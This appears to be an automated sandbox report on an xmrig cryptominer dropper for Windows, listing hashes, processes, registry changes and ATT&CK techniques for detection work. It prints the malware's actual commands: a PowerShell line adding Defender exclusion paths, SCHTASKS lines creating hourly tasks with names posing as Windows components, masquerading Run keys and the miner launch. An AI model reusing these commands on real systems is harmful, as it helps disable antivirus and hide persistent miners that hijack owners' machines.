xmrig | 9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634

Analysis

max time kernel
110s
max time network
133s
platform
windows10_x64
resource
win10-20220414-en
submitted
16-05-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe
Size

71KB
MD5

21f6e5570cf32d457f79579c92e7b6ee
SHA1

a480b64c22bd1336bf0260a798837d5a3a50c123
SHA256

9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634
SHA512

52765a61c456382bfa648a80010857547c309a084b62d3753396286d0ca2dcc9b35b8424b45f166c7b2f5b9f216df449d10809b3ac766a9d1486559150ed0a31

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Dllhost\winlogson.exe	xmrig

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

dllhost.exewinlogson.exe

pid process

2464 dllhost.exe
2284 winlogson.exe

pid	process
2464	dllhost.exe
2284	winlogson.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

dllhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2111.5-0\\MsMpEng.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe\\Cortana.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\NvStray = "C:\\Program Files\\WindowsApps\\Microsoft.x64__8wekyb3gfdfdgd8bbwe / file.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "C:\\ProgramData\\Dllhost\\dllhost.exe"	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray = "C:\\Windows\\System32\\SecurityHealthSystray.exe"	dllhost.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1464 schtasks.exe
2772 schtasks.exe
1152 schtasks.exe
2628 schtasks.exe

pid	process
1464	schtasks.exe
2772	schtasks.exe
1152	schtasks.exe
2628	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exepowershell.exepowershell.exedllhost.exe

pid	process
4012	9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe
3260	powershell.exe
3260	powershell.exe
3260	powershell.exe
636	powershell.exe
636	powershell.exe
636	powershell.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

620

pid	process
620

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exepowershell.exepowershell.exedllhost.exewinlogson.exe

description	pid	process
Token: SeDebugPrivilege	4012	9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	2464	dllhost.exe
Token: SeLockMemoryPrivilege	2284	winlogson.exe
Token: SeLockMemoryPrivilege	2284	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

winlogson.exe

pid process

2284 winlogson.exe

pid	process
2284	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.execmd.exedllhost.execmd.execmd.execmd.exeConhost.exe

description	pid	process	target process
PID 4012 wrote to memory of 412	4012	9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe	cmd.exe
PID 4012 wrote to memory of 412	4012	9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe	cmd.exe
PID 4012 wrote to memory of 412	4012	9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe	cmd.exe
PID 412 wrote to memory of 2100	412	cmd.exe	chcp.com
PID 412 wrote to memory of 2100	412	cmd.exe	chcp.com
PID 412 wrote to memory of 2100	412	cmd.exe	chcp.com
PID 412 wrote to memory of 3260	412	cmd.exe	powershell.exe
PID 412 wrote to memory of 3260	412	cmd.exe	powershell.exe
PID 412 wrote to memory of 3260	412	cmd.exe	powershell.exe
PID 412 wrote to memory of 636	412	cmd.exe	powershell.exe
PID 412 wrote to memory of 636	412	cmd.exe	powershell.exe
PID 412 wrote to memory of 636	412	cmd.exe	powershell.exe
PID 4012 wrote to memory of 2464	4012	9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe	dllhost.exe
PID 4012 wrote to memory of 2464	4012	9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe	dllhost.exe
PID 4012 wrote to memory of 2464	4012	9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe	dllhost.exe
PID 2464 wrote to memory of 1948	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1948	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1948	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2740	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2740	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2740	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1756	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1756	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1756	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1520	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1520	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1520	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 3536	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 3536	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 3536	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1908	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1908	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1908	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1652	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1652	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 1652	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 204	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 204	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 204	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2696	2464	dllhost.exe	Conhost.exe
PID 2464 wrote to memory of 2696	2464	dllhost.exe	Conhost.exe
PID 2464 wrote to memory of 2696	2464	dllhost.exe	Conhost.exe
PID 2464 wrote to memory of 2164	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2164	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2164	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 380	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 380	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 380	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2892	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2892	2464	dllhost.exe	cmd.exe
PID 2464 wrote to memory of 2892	2464	dllhost.exe	cmd.exe
PID 1520 wrote to memory of 2628	1520	cmd.exe	schtasks.exe
PID 1520 wrote to memory of 2628	1520	cmd.exe	schtasks.exe
PID 1520 wrote to memory of 2628	1520	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1464	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1464	1652	cmd.exe	schtasks.exe
PID 1652 wrote to memory of 1464	1652	cmd.exe	schtasks.exe
PID 204 wrote to memory of 1152	204	cmd.exe	schtasks.exe
PID 204 wrote to memory of 1152	204	cmd.exe	schtasks.exe
PID 204 wrote to memory of 1152	204	cmd.exe	schtasks.exe
PID 2696 wrote to memory of 2772	2696	Conhost.exe	schtasks.exe
PID 2696 wrote to memory of 2772	2696	Conhost.exe	schtasks.exe
PID 2696 wrote to memory of 2772	2696	Conhost.exe	schtasks.exe
PID 2464 wrote to memory of 2824	2464	dllhost.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe
"C:\Users\Admin\AppData\Local\Temp\9395567599cd77bffe0bdc2e0549e2e28bc6485a6f4d7c2ff4a9e48010223634.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4012

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
2⤵
- Suspicious use of WriteProcessMemory
PID:412

C:\Windows\SysWOW64\chcp.com
chcp 1251
3⤵
PID:2100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1948

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1756

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:2628

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:3536

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:204

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:1152

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:1464

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk1254" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:380

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk2849" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk8540" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:2892

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk9468" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:2696

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk9468" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:2772

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
3⤵
PID:2824

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
3⤵
PID:1828

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:2112

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe -c config.json
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe
Filesize
81KB

MD5
7b5d3b72c35448d9a6a5c8b6f6858688

SHA1
960726348e7d62ee3eb5d7384513a839cec3641b

SHA256
87fc516c05670b0b79a869fd97214de0fbd48e1c7112b1787f7a0e97670236ed

SHA512
a94aca1eb6b350aff293ec3b4d504d14d3d2da8871c452748e4d5e2909c243a4dda14bdacd2e70dfe11c5a913060884f22fb9993f3a3fe009140d547dd233f04

Download Submit
C:\ProgramData\Dllhost\dllhost.exe
Filesize
81KB

MD5
7b5d3b72c35448d9a6a5c8b6f6858688

SHA1
960726348e7d62ee3eb5d7384513a839cec3641b

SHA256
87fc516c05670b0b79a869fd97214de0fbd48e1c7112b1787f7a0e97670236ed

SHA512
a94aca1eb6b350aff293ec3b4d504d14d3d2da8871c452748e4d5e2909c243a4dda14bdacd2e70dfe11c5a913060884f22fb9993f3a3fe009140d547dd233f04

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\SystemFiles\config.json
Filesize
315B

MD5
a5d3c7c41e29e3533604efbb333a3877

SHA1
dbcf1a1c9d4331756906da4f646bf240a43a38ca

SHA256
eac1676e3c847252b8cb6d3db6584a8ef4e8b50f9a57dfa0b13acd2c99ddd2a4

SHA512
65a04a1b970848c24e2ca5bf58db12c3f7d46189231a353264609273e6378122de9c9e94b186f4ce0ff4c702b676217e88995848bfe783cacec1b0b82837eff5

Download Submit
C:\ProgramData\SystemFiles\sys_rh.bin
Filesize
1KB

MD5
847fb56b10376715135ddefc9dc4180d

SHA1
3f9872423604482f7ca5e36fd124a363f6820f79

SHA256
170e4576a6c92fce031659e755bb94c0cc7d45ba1374d95e99f98955ae8bf520

SHA512
22e0956608bd51f5e21378e6c611e8e00d5746a8c2f023ab3df575ef5d648e3d74cc8c22a8d747b9f8b2261c695f4552949851ed0e6d9999bbbaa79605f174fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
4b44bef06e8c053ef0f64104e605f1b4

SHA1
b5a92bb1b7e2411d105fcd68e9eb0b4a412bb5fe

SHA256
7bc41e308d05ff797bc884916aef98d3b48eca21cd6c5c258a7a6e9ba65a698e

SHA512
4947fdbe1db112b363942506cab73bdce414cafd2dfd1805d5bae54f0f53b1f58bef989d611b2a0a7d9b7a8e10e7a7fc4c6c3a0ea67dee82730214fd36649945

Download Submit
memory/204-760-0x0000000000000000-mapping.dmp

Download
memory/380-778-0x0000000000000000-mapping.dmp

Download
memory/412-190-0x0000000000000000-mapping.dmp

Download
memory/636-551-0x0000000000000000-mapping.dmp

Download
memory/636-609-0x0000000007FF0000-0x0000000008340000-memory.dmp

Filesize
3.3MB

Download
memory/1152-852-0x0000000000000000-mapping.dmp

Download
memory/1464-843-0x0000000000000000-mapping.dmp

Download
memory/1520-736-0x0000000000000000-mapping.dmp

Download
memory/1652-754-0x0000000000000000-mapping.dmp

Download
memory/1756-732-0x0000000000000000-mapping.dmp

Download
memory/1828-1122-0x0000000000000000-mapping.dmp

Download
memory/1908-748-0x0000000000000000-mapping.dmp

Download
memory/1948-728-0x0000000000000000-mapping.dmp

Download
memory/2100-196-0x0000000000000000-mapping.dmp

Download
memory/2112-1128-0x0000000000000000-mapping.dmp

Download
memory/2164-772-0x0000000000000000-mapping.dmp

Download
memory/2284-1137-0x0000000000000000-mapping.dmp

Download
memory/2284-1141-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/2464-616-0x0000000000000000-mapping.dmp

Download
memory/2464-683-0x0000000000F80000-0x0000000000F86000-memory.dmp

Filesize
24KB

Download
memory/2464-667-0x00000000008F0000-0x000000000090A000-memory.dmp

Filesize
104KB

Download
memory/2628-830-0x0000000000000000-mapping.dmp

Download
memory/2696-766-0x0000000000000000-mapping.dmp

Download
memory/2740-730-0x0000000000000000-mapping.dmp

Download
memory/2772-853-0x0000000000000000-mapping.dmp

Download
memory/2824-1048-0x0000000000000000-mapping.dmp

Download
memory/2892-787-0x0000000000000000-mapping.dmp

Download
memory/3260-311-0x0000000009130000-0x0000000009163000-memory.dmp

Filesize
204KB

Download
memory/3260-270-0x0000000008080000-0x00000000080CB000-memory.dmp

Filesize
300KB

Download
memory/3260-325-0x0000000009620000-0x00000000096B4000-memory.dmp

Filesize
592KB

Download
memory/3260-321-0x0000000009180000-0x0000000009225000-memory.dmp

Filesize
660KB

Download
memory/3260-312-0x0000000009110000-0x000000000912E000-memory.dmp

Filesize
120KB

Download
memory/3260-533-0x00000000095C0000-0x00000000095C8000-memory.dmp

Filesize
32KB

Download
memory/3260-274-0x0000000008210000-0x0000000008286000-memory.dmp

Filesize
472KB

Download
memory/3260-528-0x00000000095D0000-0x00000000095EA000-memory.dmp

Filesize
104KB

Download
memory/3260-269-0x0000000007960000-0x000000000797C000-memory.dmp

Filesize
112KB

Download
memory/3260-266-0x0000000007B90000-0x0000000007EE0000-memory.dmp

Filesize
3.3MB

Download
memory/3260-265-0x00000000078D0000-0x0000000007936000-memory.dmp

Filesize
408KB

Download
memory/3260-263-0x00000000071A0000-0x00000000071C2000-memory.dmp

Filesize
136KB

Download
memory/3260-245-0x0000000007230000-0x0000000007858000-memory.dmp

Filesize
6.2MB

Download
memory/3260-240-0x0000000003130000-0x0000000003166000-memory.dmp

Filesize
216KB

Download
memory/3260-204-0x0000000000000000-mapping.dmp

Download
memory/3536-742-0x0000000000000000-mapping.dmp

Download
memory/4012-148-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-153-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-169-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-171-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-172-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-173-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-174-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-175-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-176-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-177-0x000000000AA40000-0x000000000AA4A000-memory.dmp

Filesize
40KB

Download
memory/4012-178-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-179-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-180-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-181-0x000000000CDE0000-0x000000000CE46000-memory.dmp

Filesize
408KB

Download
memory/4012-182-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-183-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-184-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-185-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-186-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-187-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-168-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-167-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-166-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-165-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-164-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-163-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-162-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-161-0x000000000AAB0000-0x000000000AB42000-memory.dmp

Filesize
584KB

Download
memory/4012-160-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-159-0x000000000AF10000-0x000000000B40E000-memory.dmp

Filesize
5.0MB

Download
memory/4012-158-0x0000000002F10000-0x0000000002F16000-memory.dmp

Filesize
24KB

Download
memory/4012-157-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-156-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-155-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-154-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-170-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-152-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-151-0x0000000000CF0000-0x0000000000D08000-memory.dmp

Filesize
96KB

Download
memory/4012-150-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-149-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-118-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-147-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-146-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-145-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-144-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-143-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-142-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-141-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-140-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-139-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-138-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-137-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-136-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-135-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-134-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
memory/4012-133-0x0000000077490000-0x000000007761E000-memory.dmp

Filesize
1.6MB

Download
